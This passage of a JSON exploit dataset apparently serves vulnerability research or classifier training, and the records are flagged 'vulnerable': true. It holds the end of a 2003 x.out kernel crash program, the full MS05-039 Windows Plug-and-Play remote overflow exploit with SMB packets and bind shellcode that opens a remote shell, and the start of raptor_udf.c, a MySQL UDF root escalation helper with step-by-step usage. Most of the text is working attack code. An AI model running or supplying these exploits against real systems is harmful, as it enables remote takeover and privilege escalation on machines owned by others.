*/\n\nlong xi_rep; /* number of replications */\n\nlong xi_offset; /* offset within segment to replicated data */\n\n};\n\n\n\n#define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext))\n\n\n\nint exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *);\n\n\n\n#endif /* !_IBCS2_EXEC_H_ */\n\n\n\nint main(int ac,char **av)\n\n{\n\nint fd;\n\nstruct xexec xp;\n\nstruct xext xep;\n\nchar exe[10];\n\nchar fil[]=\"./vvc\";\n\n\n\nfd=open(fil,O_CREAT|O_RDWR,0700);\n\nif (fd==-1) {perror(\"open\");return 1;}\n\nmemset(&xp,0,sizeof(xp));\n\nmemset(&xep,0,sizeof(xep));\n\nmemset(exe,'v',sizeof(exe));\n\nxp.x_magic = XOUT_MAGIC;\n\nxp.x_cpu = XC_386;\n\nxp.x_renv = XE_EXEC;\n\nxp.x_ext = sizeof(xep);\n\nxep.xe_segsize = -1;\n\nwrite(fd,&xp,sizeof(xp));\n\nwrite(fd,&xep,sizeof(xep));\n\nwrite(fd,exe,sizeof(exe));\n\nprintf(\"Now exec %s\\n\",fil);\n\n\n\n}\n\n\n\n// milw0rm.com [2003-11-07]",
940        "vulnerable": true
941    },
942    {
943        "exploit_id": 1180,
944        "content": "/*\n\n * HOD-ms05039-pnp-expl-french.c [25.Aug.2005]\n\n * Very slightly modified version by Fabrice MOURRON <fmourron@exaprobe.com>\n\n * Tested on Win2k SP4 Frencg\n\n * Original credits & comments follow.\n\n */\n\n\n\n\n\n/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2\n\n *\n\n * Copyright (c) 2005 houseofdabus.\n\n *\n\n * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n\n * Universal Exploit + no crash shellcode\n\n *\n\n *\n\n *\n\n *\n\n *                 .::[ houseofdabus ]::.\n\n *\n\n *\n\n *\n\n * ---------------------------------------------------------------------\n\n * Description:\n\n *    A remote code execution and local elevation of privilege\n\n *    vulnerability exists in Plug and Play that could allow an\n\n *    attacker who successfully exploited this vulnerability to take\n\n *    complete control of the affected system.\n\n *\n\n *    This is a remote code execution and local privilege elevation\n\n *    vulnerability. On Windows 2000, an anonymous attacker could\n\n *    remotely try to exploit this vulnerability.\n\n *\n\n *    On Windows XP Service Pack 1, only an authenticated user could\n\n *    remotely try to exploit this vulnerability.\n\n *    On Window XP Service Pack 2 and Windows Server 2003, only an\n\n *    administrator can remotely access the affected component.\n\n *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,\n\n *    this is strictly a local privilege elevation vulnerability.\n\n *    An anonymous user cannot remotely attempt to exploit this\n\n *    vulnerability on Windows XP Service Pack 2 and Windows\n\n *    Server 2003.\n\n *\n\n * ---------------------------------------------------------------------\n\n * Solution:\n\n *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx\n\n *\n\n * ---------------------------------------------------------------------\n\n * Systems Affected:\n\n *    - Windows Server 2003, SP1\n\n *    - Windows XP SP1, SP2\n\n *    - Windows 2000 SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Tested on:\n\n *    - Windows 2000 SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Compile:\n\n *\n\n * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\n\n *\n\n * ---------------------------------------------------------------------\n\n * Example:\n\n *\n\n * C:\\>HOD-ms05039-pnp-expl 192.168.0.1 7777\n\n *\n\n * [*] connecting to 192.168.0.22:445...ok\n\n * [*] null session...ok\n\n * [*] bind pipe...ok\n\n * [*] sending crafted packet...ok\n\n * [*] check your shell on 192.168.0.1:7777\n\n * Ctrl+C\n\n *\n\n * C:\\>nc 192.168.0.1 7777\n\n *\n\n * Microsoft Windows 2000 [Version 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n * C:\\WINNT\\system32>\n\n *\n\n * ---------------------------------------------------------------------\n\n *\n\n * This is provided as proof-of-concept code only for educational\n\n * purposes and testing by authorized individuals with permission\n\n * to do so.\n\n *\n\n */\n\n\n\n/* #define _WIN32 */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#ifdef _WIN32\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32\")\n\n#else\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n#include <netdb.h>\n\n#endif\n\n\n\n\n\nunsigned char SMB_Negotiate[] =\n\n\t\"\\x00\\x00\\x00\\x85\\xFF\\x53\\x4D\\x42\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x62\\x00\\x02\\x50\\x43\\x20\\x4E\\x45\\x54\\x57\\x4F\"\n\n\t\"\\x52\\x4B\\x20\\x50\\x52\\x4F\\x47\\x52\\x41\\x4D\\x20\\x31\\x2E\\x30\\x00\\x02\"\n\n\t\"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\\x02\\x57\\x69\\x6E\\x64\\x6F\"\n\n\t\"\\x77\\x73\\x20\\x66\\x6F\\x72\\x20\\x57\\x6F\\x72\\x6B\\x67\\x72\\x6F\\x75\\x70\"\n\n\t\"\\x73\\x20\\x33\\x2E\\x31\\x61\\x00\\x02\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\"\n\n\t\"\\x32\\x00\\x02\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x32\\x2E\\x31\\x00\\x02\\x4E\\x54\"\n\n\t\"\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\";\n\n\n\n\n\nunsigned char SMB_SessionSetupAndX[] =\n\n\t\"\\x00\\x00\\x00\\xA4\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x00\\x10\\x00\\x0C\\xFF\\x00\\xA4\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x69\\x00\\x4E\"\n\n\t\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x01\\x00\\x00\\x00\\x97\\x82\\x08\\xE0\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\"\n\n\t\"\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\"\n\n\t\"\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\"\n\n\t\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\"\n\n\t\"\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_SessionSetupAndX2[] =\n\n\t\"\\x00\\x00\\x00\\xDA\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x08\\x20\\x00\\x0C\\xFF\\x00\\xDA\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x57\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x9F\\x00\\x4E\"\n\n\t\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x46\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x47\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x06\\x00\\x06\\x00\\x40\"\n\n\t\"\\x00\\x00\\x00\\x10\\x00\\x10\\x00\\x47\\x00\\x00\\x00\\x15\\x8A\\x88\\xE0\\x48\"\n\n\t\"\\x00\\x4F\\x00\\x44\\x00\\x00\\xED\\x41\\x2C\\x27\\x86\\x26\\xD2\\x59\\xA0\\xB3\"\n\n\t\"\\x5E\\xAA\\x00\\x88\\x6F\\xC5\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\"\n\n\t\"\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\"\n\n\t\"\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\"\n\n\t\"\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\"\n\n\t\"\\x30\\x00\\x20\\x00\\x35\\x00\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_TreeConnectAndX[] =\n\n\t\"\\x00\\x00\\x00\\x5A\\xFF\\x53\\x4D\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\n\n\t\"\\x00\\x08\\x30\\x00\\x04\\xFF\\x00\\x5A\\x00\\x08\\x00\\x01\\x00\\x2F\\x00\\x00\";\n\n\n\n\n\n\n\nunsigned char SMB_TreeConnectAndX_[] =\n\n\t\"\\x00\\x00\\x3F\\x3F\\x3F\\x3F\\x3F\\x00\";\n\n\n\n\n\n/* browser */\n\nunsigned char SMB_PipeRequest_browser[] =\n\n\t\"\\x00\\x00\\x00\\x66\\xFF\\x53\\x4D\\x42\\xA2\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x40\\x00\\x18\\xFF\\x00\\xDE\\xDE\\x00\\x10\\x00\\x16\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x9F\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\n\n\t\"\\x02\\x00\\x00\\x00\\x03\\x13\\x00\\x00\\x5C\\x00\\x62\\x00\\x72\\x00\\x6F\\x00\"\n\n\t\"\\x77\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char SMB_PNPEndpoint[] =\n\n/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */\n\n\t\"\\x00\\x00\\x00\\x9C\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x50\\x00\\x10\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x48\\x00\\x54\\x00\\x02\"\n\n\t\"\\x00\\x26\\x00\\x00\\x40\\x59\\x00\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\n\t\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\"\n\n\t\"\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xB8\\x10\\xB8\\x10\\x00\\x00\\x00\\x00\"\n\n\t\"\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x40\\x4E\\x9F\\x8D\\x3D\\xA0\\xCE\\x11\"\n\n\t\"\\x8F\\x69\\x08\\x00\\x3E\\x30\\x05\\x1B\\x01\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\"\n\n\t\"\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\n\n\n\n\n\n\n\nunsigned char RPC_call[] =\n\n\t\"\\x00\\x00\\x08\\x90\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\n\n\t\"\\x00\\x08\\x60\\x00\\x10\\x00\\x00\\x3C\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x3C\\x08\\x54\\x00\\x02\"\n\n\t\"\\x00\\x26\\x00\\x00\\x40\\x4D\\x08\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\n\n\t\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\"\n\n\t\"\\x3C\\x08\\x00\\x00\\x01\\x00\\x00\\x00\\x24\\x08\\x00\\x00\\x00\\x00\\x36\\x00\"\n\n\t\"\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x52\\x00\\x4F\\x00\"\n\n\t\"\\x4F\\x00\\x54\\x00\\x5C\\x00\\x53\\x00\\x59\\x00\\x53\\x00\\x54\\x00\\x45\\x00\"\n\n\t\"\\x4D\\x00\\x5C\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xFF\\xFF\\x00\\x00\\xE0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n\t\"\\xC0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\n\n\t/* jmp over - entry point */\n\n\t\"\\xEB\\x08\\x90\\x90\"\n\n\n\n\t/* pop reg; pop reg; retn; - umpnpmgr.dll for french*/\n\n\t\"\\x67\\x15\\x74\\x76\" /* 0x76741567 */\n\n\n\n\t/* jmp ebx - umpnpmgr.dll (BROKEN)\n\n\t\"\\x6f\\x36\\x77\\x76\" */\n\n\n\n\t\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x77\\x76\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x08\\x90\\x90\\x48\\x4F\\x44\\x88\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";\n\n\n\n\n\nunsigned char RPC_call_end[] =\n\n\t\"\\xE0\\x07\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\n\n\n\n\n\nunsigned char bind_shellcode[] =\n\n\t\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x19\"\n\n\t\"\\xf5\\x04\\x37\\x83\\xeb\\xfc\\xe2\\xf4\\xe5\\x9f\\xef\\x7a\\xf1\\x0c\\xfb\\xc8\"\n\n\t\"\\xe6\\x95\\x8f\\x5b\\x3d\\xd1\\x8f\\x72\\x25\\x7e\\x78\\x32\\x61\\xf4\\xeb\\xbc\"\n\n\t\"\\x56\\xed\\x8f\\x68\\x39\\xf4\\xef\\x7e\\x92\\xc1\\x8f\\x36\\xf7\\xc4\\xc4\\xae\"\n\n\t\"\\xb5\\x71\\xc4\\x43\\x1e\\x34\\xce\\x3a\\x18\\x37\\xef\\xc3\\x22\\xa1\\x20\\x1f\"\n\n\t\"\\x6c\\x10\\x8f\\x68\\x3d\\xf4\\xef\\x51\\x92\\xf9\\x4f\\xbc\\x46\\xe9\\x05\\xdc\"\n\n\t\"\\x1a\\xd9\\x8f\\xbe\\x75\\xd1\\x18\\x56\\xda\\xc4\\xdf\\x53\\x92\\xb6\\x34\\xbc\"\n\n\t\"\\x59\\xf9\\x8f\\x47\\x05\\x58\\x8f\\x77\\x11\\xab\\x6c\\xb9\\x57\\xfb\\xe8\\x67\"\n\n\t\"\\xe6\\x23\\x62\\x64\\x7f\\x9d\\x37\\x05\\x71\\x82\\x77\\x05\\x46\\xa1\\xfb\\xe7\"\n\n\t\"\\x71\\x3e\\xe9\\xcb\\x22\\xa5\\xfb\\xe1\\x46\\x7c\\xe1\\x51\\x98\\x18\\x0c\\x35\"\n\n\t\"\\x4c\\x9f\\x06\\xc8\\xc9\\x9d\\xdd\\x3e\\xec\\x58\\x53\\xc8\\xcf\\xa6\\x57\\x64\"\n\n\t\"\\x4a\\xa6\\x47\\x64\\x5a\\xa6\\xfb\\xe7\\x7f\\x9d\\x1a\\x55\\x7f\\xa6\\x8d\\xd6\"\n\n\t\"\\x8c\\x9d\\xa0\\x2d\\x69\\x32\\x53\\xc8\\xcf\\x9f\\x14\\x66\\x4c\\x0a\\xd4\\x5f\"\n\n\t\"\\xbd\\x58\\x2a\\xde\\x4e\\x0a\\xd2\\x64\\x4c\\x0a\\xd4\\x5f\\xfc\\xbc\\x82\\x7e\"\n\n\t\"\\x4e\\x0a\\xd2\\x67\\x4d\\xa1\\x51\\xc8\\xc9\\x66\\x6c\\xd0\\x60\\x33\\x7d\\x60\"\n\n\t\"\\xe6\\x23\\x51\\xc8\\xc9\\x93\\x6e\\x53\\x7f\\x9d\\x67\\x5a\\x90\\x10\\x6e\\x67\"\n\n\t\"\\x40\\xdc\\xc8\\xbe\\xfe\\x9f\\x40\\xbe\\xfb\\xc4\\xc4\\xc4\\xb3\\x0b\\x46\\x1a\"\n\n\t\"\\xe7\\xb7\\x28\\xa4\\x94\\x8f\\x3c\\x9c\\xb2\\x5e\\x6c\\x45\\xe7\\x46\\x12\\xc8\"\n\n\t\"\\x6c\\xb1\\xfb\\xe1\\x42\\xa2\\x56\\x66\\x48\\xa4\\x6e\\x36\\x48\\xa4\\x51\\x66\"\n\n\t\"\\xe6\\x25\\x6c\\x9a\\xc0\\xf0\\xca\\x64\\xe6\\x23\\x6e\\xc8\\xe6\\xc2\\xfb\\xe7\"\n\n\t\"\\x92\\xa2\\xf8\\xb4\\xdd\\x91\\xfb\\xe1\\x4b\\x0a\\xd4\\x5f\\xf6\\x3b\\xe4\\x57\"\n\n\t\"\\x4a\\x0a\\xd2\\xc8\\xc9\\xf5\\x04\\x37\";\n\n\n\n#define SET_PORTBIND_PORT(buf, port) \\\n\n\t*(unsigned short *)(((buf)+186)) = (port)\n\n\n\n\n\nvoid\n\nconvert_name(char *out, char *name)\n\n{\n\n\tunsigned long len;\n\n\n\n\tlen = strlen(name);\n\n\tout += len * 2 - 1;\n\n\twhile (len--) {\n\n\t\t*out-- = '\\x00';\n\n\t\t*out-- = name[len];\n\n\t}\n\n}\n\n\n\n\n\n\n\nint\n\nmain (int argc, char **argv)\n\n{\n\n\tstruct sockaddr_in addr;\n\n\tstruct hostent *he;\n\n\tint len;\n\n\tint sockfd;\n\n\tunsigned short smblen;\n\n\tunsigned short bindport;\n\n\tunsigned char tmp[1024];\n\n\tunsigned char packet[4096];\n\n\tunsigned char *ptr;\n\n\tchar recvbuf[4096];\n\n\n\n#ifdef _WIN32\n\n\tWSADATA wsa;\n\n\tWSAStartup(MAKEWORD(2,0), &wsa);\n\n#endif\n\n\n\n\tprintf(\"\\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\\n\");\n\n\tprintf(\"\\t         Universal Exploit + no crash shellcode\\n\\n\");\n\n\tprintf(\"\\t         [French hack by ExaProbe :-)]\\n\\n\\n\");\n\n\tprintf(\"\\t            Copyright (c) 2005 .: houseofdabus :.\\n\\n\\n\");\n\n\n\n\n\n\tif (argc < 3) {\n\n\t\tprintf(\"%s <host> <bind port>\\n\", argv[0]);\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif ((he = gethostbyname(argv[1])) == NULL) {\n\n\t\tprintf(\"[-] Unable to resolve %s\\n\", argv[1]);\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n\n\t\tprintf(\"[-] socket failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\taddr.sin_family = AF_INET;\n\n\taddr.sin_port = htons(445);\n\n\taddr.sin_addr = *((struct in_addr *)he->h_addr);\n\n\tmemset(&(addr.sin_zero), '\\0', 8);\n\n\n\n\n\n\n\n\tprintf(\"\\n[*] connecting to %s:445...\", argv[1]);\n\n\tif (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {\n\n\t\tprintf(\"\\n[-] connect failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"ok\\n\");\n\n\n\n\tprintf(\"[*] null session...\");\n\n\tif (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif (len <= 10) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tptr = packet;\n\n\tmemcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);\n\n\tptr += sizeof(SMB_TreeConnectAndX)-1;\n\n\n\n\tsprintf(tmp, \"\\\\\\\\%s\\\\IPC$\", argv[1]);\n\n\tconvert_name(ptr, tmp);\n\n\tsmblen = strlen(tmp)*2;\n\n\tptr += smblen;\n\n\tsmblen += 9;\n\n\tmemcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);\n\n\n\n\tmemcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);\n\n\tptr += sizeof(SMB_TreeConnectAndX_)-1;\n\n\n\n\tsmblen = ptr-packet;\n\n\tsmblen -= 4;\n\n\tmemcpy(packet+3, &smblen, 1);\n\n\n\n\tif (send(sockfd, packet, ptr-packet, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] bind pipe...\");\n\n\n\n\tif (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tif (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tlen = recv(sockfd, recvbuf, 4096, 0);\n\n\tif ((len <= 10) || (recvbuf[9] != 0)) {\n\n\t\tprintf(\"\\n[-] failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] sending crafted packet...\");\n\n\n\n\t// nop\n\n\tptr = packet;\n\n\tmemset(packet, '\\x90', sizeof(packet));\n\n\n\n\t// header & offsets\n\n\tmemcpy(ptr, RPC_call, sizeof(RPC_call)-1);\n\n\tptr += sizeof(RPC_call)-1;\n\n\n\n\t// shellcode\n\n\tbindport = (unsigned short)atoi(argv[2]);\n\n\tbindport ^= 0x0437;\n\n\tSET_PORTBIND_PORT(bind_shellcode, htons(bindport));\n\n\tmemcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);\n\n\n\n\t// end of packet\n\n\tmemcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,\n\n\t\tRPC_call_end,\n\n\t\tsizeof(RPC_call_end)-1);\n\n\n\n\t// sending...\n\n\tif (send(sockfd, packet, 2196, 0) < 0) {\n\n\t\tprintf(\"\\n[-] send failed\\n\");\n\n\t\texit(0);\n\n\t}\n\n\tprintf(\"ok\\n\");\n\n\tprintf(\"[*] check your shell on %s:%i\\n\", argv[1], atoi(argv[2]));\n\n\n\n\trecv(sockfd, recvbuf, 4096, 0);\n\n\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-25]",
945        "vulnerable": true
946    },
947    {
948        "exploit_id": 1181,
949        "content": "/*\n\n * $Id: raptor_udf.c,v 1.1 2004/12/04 14:44:39 raptor Exp $\n\n *\n\n * raptor_udf.c - dynamic library for do_system() MySQL UDF\n\n * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n *\n\n * This is an helper dynamic library for local privilege escalation through \n\n * MySQL run with root privileges (very bad idea!). Tested on MySQL 4.0.17.\n\n *\n\n * Code ripped from: http://www.ngssoftware.com/papers/HackproofingMySQL.pdf\n\n *\n\n * \"MySQL provides a mechanism by which the default set of functions can be \n\n * expanded by means of custom written dynamic libraries containing User \n\n * Defined Functions, or UDFs\". -- Hackproofing MySQL\n\n *\n\n * Usage:\n\n * $ id\n\n * uid=500(raptor) gid=500(raptor) groups=500(raptor)\n\n * $ gcc -g -c raptor_udf.c\n\n * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc\n\n * $ mysql -u root -p\n\n * Enter password:\n\n * [...]\n\n * mysql> use mysql;\n\n * mysql> create table foo(line blob);\n\n * mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));\n\n * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';\n\n * mysql> create function do_system returns integer soname 'raptor_udf.so';\n\n * mysql> select * from mysql.func;\n\n * +-----------+-----+---------------+----------+\n\n * | name      | ret | dl            | type     |\n\n * +-----------+-----+---------------+----------+\n\n * | do_system |   2 | raptor_udf.so | function |\n\n * +-----------+-----+---------------+----------+\n\n * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');\n\n * mysql> \\! sh\n\n * sh-2.05b$ cat /tmp/out\n\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)\n\n * [...]\n\n */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n\n\nenum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};\n\n\n\ntypedef struct st_udf_args {\n\n\tunsigned int\t\targ_count;\t// number of arguments\n\n\tenum Item_result\t*arg_type;\t// pointer to item_result\n\n\tchar \t\t\t**args;\t\t// pointer to arguments\n\n\tunsigned long\t\t*lengths;\t// length of string args\n\n\tchar\t\t\t*maybe_null;\t// 1 for maybe_null args\n\n} 